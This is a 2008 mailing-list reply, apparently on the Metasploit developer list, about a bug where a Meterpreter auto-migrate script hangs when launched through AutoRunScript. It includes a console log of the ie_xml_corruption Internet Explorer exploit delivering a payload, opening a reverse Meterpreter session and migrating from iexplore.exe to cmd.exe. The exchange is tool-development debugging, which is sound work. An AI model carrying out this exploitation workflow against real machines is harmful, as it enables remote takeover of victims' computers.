Meterpreter script to auto-migrate

[natron at invisibledenizen.org (natron)]

On Sat, Dec 13, 2008 at 10:46 AM, H D Moore <hdm at metasploit.com> wrote:
> On Saturday 13 December 2008, natron wrote:
> > I think this may be a combination of two bugs, one is known and
> > labeled in the code, but I think the other one is new.
> >
> > 1) When I run it with AutoRunScript it hangs on the
> > client.sys.process.execute call.  Is it possible that something with
> > the client object isn't set up until you do an "interact -i #"?  It
> > works almost 100% of the time for me within a session.  If that's it,
> > would it be possible to manually set up the client object somehow?
>
> A migrate in the AutoRunScript before the session is setup may break some
> of the initialization code, I opened ticket #266 to track it.

It doesn't appear to be a problem with the migrate code; it's getting
hung up on the code to execute a new process.  To double check, I
verified the original migrate.rb script still works as an
AutoRunScript:

The migrate code appears to work, it's the call to execute a new
process that hangs up.  Using the scripts/meterpreter/migrate.rb
(modified to migrate to cmd.exe rather than lsass.exe):

msf exploit(ie_xml_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ie_xml_corruption) >
[*] Handler binding to LHOST 192.168.1.112
[*] Started reverse handler
[*] Using URL: http://192.168.1.112:8080/ie-xml-corruption.html
[*] Server started.
[*] Sending HTML to 192.168.1.108:2060...
[*] Sending DLL to 192.168.1.108:2060...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to cmd.exe...
[*] Current server process: iexplore.exe (3564)
[*] New server process: cmd.exe (3848)
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.108:2062)